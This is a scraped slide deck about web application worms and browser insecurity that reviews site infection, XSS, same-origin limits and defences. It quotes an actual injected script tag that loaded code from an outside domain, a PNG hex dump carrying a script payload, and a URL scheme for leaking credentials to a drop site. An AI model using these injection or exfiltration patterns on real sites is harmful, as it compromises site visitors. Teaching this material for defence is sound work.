Web Application Worms & Browser Insecurity



Similar documents
WEB ATTACKS AND COUNTERMEASURES

Cross-Site Scripting

The Top Web Application Attacks: Are you vulnerable?

Web Application Security

Introduction to Computer Security

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Defending Against Cyber Attacks with SessionLevel Network Security

Web-Application Security

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

How To Understand The History Of The Web (Web)

Where every interaction matters.

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

What is Web Security? Motivation

MatriXay WEB Application Vulnerability Scanner V Overview. (DAS- WEBScan ) The best WEB application assessment tool

(WAPT) Web Application Penetration Testing

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

The McAfee SECURE TM Standard

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Fighting Advanced Threats

Auditing Web Applications

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Jorge Blanco Alcover. Mike Shema. Technical Editor SYNGRESS

The Prevalence of Flash Vulnerabilities on the Web

Application Security Best Practices. Wally LEE Principal Consultant

Recommended Practice Case Study: Cross-Site Scripting. February 2007

WHY DOES MY SPEED MONITORING GRAPH SHOW -1 IN THE TOOLTIP? 2 HOW CAN I CHANGE MY PREFERENCES FOR UPTIME AND SPEED MONITORING 2

Course Content: Session 1. Ethics & Hacking

Enterprise Incident Response: Network Intrusion Case Studies and Countermeasures

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Criteria for web application security check. Version

WEB SECURITY. Oriana Kondakciu Software Engineering 4C03 Project

Introduction: 1. Daily 360 Website Scanning for Malware

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

elearning for Secure Application Development

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Guidelines for Website Security and Security Counter Measures for e-e Governance Project

Guidelines for Web applications protection with dedicated Web Application Firewall

Advancements in Botnet Attacks and Malware Distribution

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist

Rational AppScan & Ounce Products

Hack Proof Your Webapps

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

IBM Protocol Analysis Module

Barracuda Web Site Firewall Ensures PCI DSS Compliance

Web Application Penetration Testing

Networking for Caribbean Development

April 11, (Revision 2)

Networks and Security Lab. Network Forensics

An Insight into Cookie Security

White Paper. Why Next-Generation Firewalls Don t Stop Advanced Malware and Targeted APT Attacks

Web and Security 1 / 40

Exploring the Black Hole Exploit Kit

End-user Security Analytics Strengthens Protection with ArcSight

CS 558 Internet Systems and Technologies

The Key to Secure Online Financial Transactions

Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

Spear Phishing Attacks Why They are Successful and How to Stop Them

QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

Student Tech Security Training. ITS Security Office

CS5008: Internet Computing

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

Network Security Audit. Vulnerability Assessment (VA)

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Web Security School Final Exam

Why Device Fingerprinting Provides Better Network Security than IP Blocking. How to transform the economics of hacking in your favor

SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Penetration Testing Service. By Comsec Information Security Consulting

Sitefinity Security and Best Practices

Botnets Die Hard Owned and Operated

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Certified Secure Computer User

Microsoft Security Intelligence Report volume 7 (January through June 2009)

WEB APPLICATION SECURITY

Cyber Security in Taiwan's Government Institutions: From APT To. Investigation Policies

Web Application Security 101

Check list for web developers

What do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware

OWASP Top Ten Tools and Tactics

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

EUCIP - IT Administrator. Module 5 IT Security. Version 2.0

Penetration Testing with Kali Linux

Chapter 4 Application, Data and Host Security

Transcription:

Web Application Worms & Browser Insecurity Mike Shema <mshema@qualys.com>

Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys on web application vulnerability scanning. Conducted penetration tests against variety of web platforms, languages, and business processes. 2

Overview Highlight current state of web security Explain the current state of browser security Review recent attacks against the browser Demonstrate evolving attacks against the browser Identify current methods for protecting the browser Highlight future browser defenses and possible attack trends 3

Web Security Web application (in)security continues to grow. Web-related vulnerabilities pop up on Bugtraq daily. (http://www.securityfocus.com/bid/) Web-related attacks are large and expensive to investigate, react, and resolve. 45.7 million credit cards stolen from retailer (http://www.msnbc.msn.com/id/17871485/) Common focus on threats to the web application. What about threats from the web application? 4

Web Security 2005-2007: Web security widens its field and deepens it reach Attackers target large properties: MySpace, Google, Yahoo! Researchers target application engines: Month of PHP bugs (http://www.phpsecurity.org/) Exploits target browsers: malicious JavaScript XSS remains a significant problem. 5

Browser Security Web browsers are not prepared for emerging threats. Code (e.g. JavaScript, Java, Flash) is executed with the assumption of trust. Forensic challenges Resource links do not appear in the browser history. No-Cache instructions might inhibit the browser from saving a copy of the malicious page. Network devices might only record IP address and port for SSL requests -- no idea if the request was safe. Current security measures are inadequate or bypassed by certain attacks. Same Origin Rule Cookie attributes (secure, httponly) 6

Same Origin Rule Affects read/write access to cookies. Affects JavaScript access to DOM. Applies to XMLHttpRequest object. Effective, but inadequate as a sole solution. Not always implemented properly in plug-ins Relies on a single attribute: Domain Dictates yes/no data access, not data usage. 7

Threats Evolve Financial motivation Credit card theft moves into credential theft Attackers obtain up to $10 for a stolen online game account, $6 for a credit card (http://news.bbc.co.uk/2/hi/technology/6526851.stm) Infect rather than deface Add malicious content to a site to spread compromise to visitors of the site (http://isc.sans.org/diary.html?storyid=2166) Defacement detected quickly, infection detected slowly Exploit the trust between the server and browser Thrive on the increase in user-generated content MySpace, Youtube, etc. 8

Site Infection Insert malicious content into a web page Less likely to be noticed than a defacement Each visitor to the site is a potential victim The malicious content only need to point to a server controlled by the attacker. The exploit can be dynamically updated without re-accessing the compromised web site. The exploit could be customized to the victim s environment (browser type, IP address) Victim comes to the exploit, rather than trying to send the exploit to the victim. 9

Site Infection Exploit requires a single line of HTML <script src="http://w1c.cn/3.js"></script > Discovered February 2, 2007 Evidence of compromise as far back as November 2006 Similar compromise discovered on over two dozen other sites. Sources: http://www.websense.com/secu ritylabs/alerts/alert.php?alertid =733 http://isc.sans.org/diary.html?st oryid=2166 10

Attack Methods Exploit a browser vulnerability Direct victim s browser to a binary exploit Flash Player, November 2006 (http://www.microsoft.com/technet/security/bulletin/ms06-069.mspx) Windows Animated Cursor, April 2007 (http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx) Exploit can be hosted on a trusted or familiar site Malware on German Wikipedia site, November 2006 (http://www.technewsworld.com/story/54118.html) 11

Attack Methods Malicious JavaScript Programming language executed in the browser Ability to modify, add, and monitor browser properties and events. An HTML injection flaw can lead to significant compromises of the user. Malicious JavaScript is not inhibited by the Same Origin Rule -- it s already on the origin! Same Origin Rule does not block JavaScript from sending data to a different domain 12

Information Leakage Unaffected by Same Origin Rule Automatic POST submissions are not always possible. Many URIs are automatically loaded by the browser. src attribute <object> elements Encode information in the path or query string. (HTTP) http://dropsite/user/password Encode information in the server name. (DNS) 13

Malicious JavaScript Prevalence of AJAX-style web applications JavaScript is a requirement to browse these sites, users can t be expected to disable JavaScript as a security precaution. New features with old vulnerabilities JavaScript inside PDF January 2007 (http://www.kb.cert.org/vuls/id/815960) May 2003 (http://www.kb.cert.org/vuls/id/184820) Forging HTTP headers with Flash, July 2006 (http://tinyurl.com/38onf3) Firefox plug-in doesn t enforce Same Origin Rule, July 2005 (http://simonwillison.net/2005/jul/20/vulnerability/) Old features with new vulnerabilities Internet Explorer MIME type detection 14

Old Vulns, New(?) Features HTML Injection shows up where you least expect it Internet Explorer MIME type detection explained in MSDN article, applies to IE 4.0 and later (http://tinyurl.com/ovi7) Netscape Navigator GIF comment XSS, November 2001 (http://www.securityfocus.com/bid/2637/) Windows XP SP2 provides control to toggle MIME Sniffing, August 2004 (http://tinyurl.com/ynkcum) Internet Explorer 7 MIME type detection XSS, February 2007 (http://www.splitbrain.org/blog/2007-02/12- internet_explorer_facilitates_cross_site_scripting) Security implications might take years to understand (or relearn) 15

IE Mime Type Detection 0000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452.PNG...IHDR 0000010: 0000 0001 0000 0001 0802 0000 0090 7753...wS 0000020: de00 0000 2b69 5458 746a 7300 3c73 6372...+iTXtjs.<scr 0000030: 6970 743e 616c 6572 7428 646f 6375 6d65 ipt>alert(docume 0000040: 6e74 2e64 6f6d 6169 6e29 3c2f 7363 7269 nt.domain)</scri 0000050: 7074 3e44 ec11 ca00 0000 0c49 4441 5478 pt>d...idatx 0000060: da63 f8ff ff3f 0005 fe02 fe33 1295 1400.c...?...3... 0000070: 0000 0049 454e 44ae 4260 82...IEND.B`. 16

Web Application Worms Transmission nodes Social networking (e.g. MySpace) Media aggregation (e.g. YouTube) User-generated content (e.g. Wikipedia, blogs) Transmission techniques Browser exploit (buffer overflow) Malicious JavaScript in payload Malicious JavaScript hosted on drop site Semi-persistent nodes Active while the browser is open 17

Insecure Execution Environment Good points Same Origin Policy attempts to minimize threat of cross-domain attacks Browser intended to prevent access to localhost Internet Explorer zones Acknowledges that different sites should have different levels of trust Difficult to maintain, understand for unsophisticated users 18

Insecure Execution Environment Deficient areas and challenges Assumption of trust in HTML (no signed content) No separation of UI generation and data manipulation JavaScript can affect all aspects of DOM Leads to exploits like XSS, phishing, social engineering No restrictions on pulling together inter-domain content, no trusted peers for a domain. Some exceptions for images and cookies, due to spam and advertisers The client can access URIs from any domain, which can be exploited to load malicious content or exfiltrate sensitive information. DNS load balancing, third-party content servers (e.g. Akamai), open nature of the web make this an extremely difficult problem. Establishing trust requires a third-party to the server and browser. More infrastructure, more complexity How many people pay attention to SSL certificate validity? How many browsers still support SSLv2? 19

Browser Security Some problems can t be solved in the browser or require more infrastructure. Social engineering tricks victim into divulging sensitive information. Expectation of trust Trusted site with malicious content. Obfuscated links: http://tinyurl.com/2y3lju Strong authentication and identification http://openid.net/ http://www.eclipse.org/higgins/ http://www.projectliberty.org/ 20

Proactive Countermeasures Web application security audit Prevent unexpected HTML injection Identify areas where user-generated content is permitted Minimize the potential for the application to be used as a distribution point for malicious content 21

Reactive Countermeasures Proxies Centralizes access control to web sites Access logs may be able to identify compromised browsers or browsers that have navigated to sites that are known to have malicious content Attacks might still be able to hide within SSL connections 22

Countermeasures in the Browser Browser anti-virus Current A/V already detects many known Trojans, exploits Host-based Intrusion Detection System may prevent some buffer overflows Anti-Spyware and -malware solutions focus on requests to blacklisted domains or content signatures With the exception of HIDS, these rely on blacklists and signatures. An HTML or JavaScript payload can be written in many different ways. DOM access and prompts for information (e.g. password, credit card number) are not inherently malicious. Signatures and blacklists are a reactive measure. 23

Countermeasures Forward-looking controls Federated authentication, identification Separation of UI and data access control JavaScript-aware Browser-based Intrusion Detection System Description is easier than implementation! 24

Trends As HTML-enabled applications and devices grow, expect old vulnerabilities to reoccur in new areas. Hand-held mobile devices (e.g. phones) Application plug-ins for media (e.g. Flash Player) Greater sophistication in HTML injection (polymorphic JavaScript) More attacks against the browser Greater pool of victims Uniform exploit environment (HTML, JavaScript similar enough in IE, Safari, Firefox, Opera, etc.) The browser will become a relay for attacks against other servers. 25

Questions? 26

Thank you! 27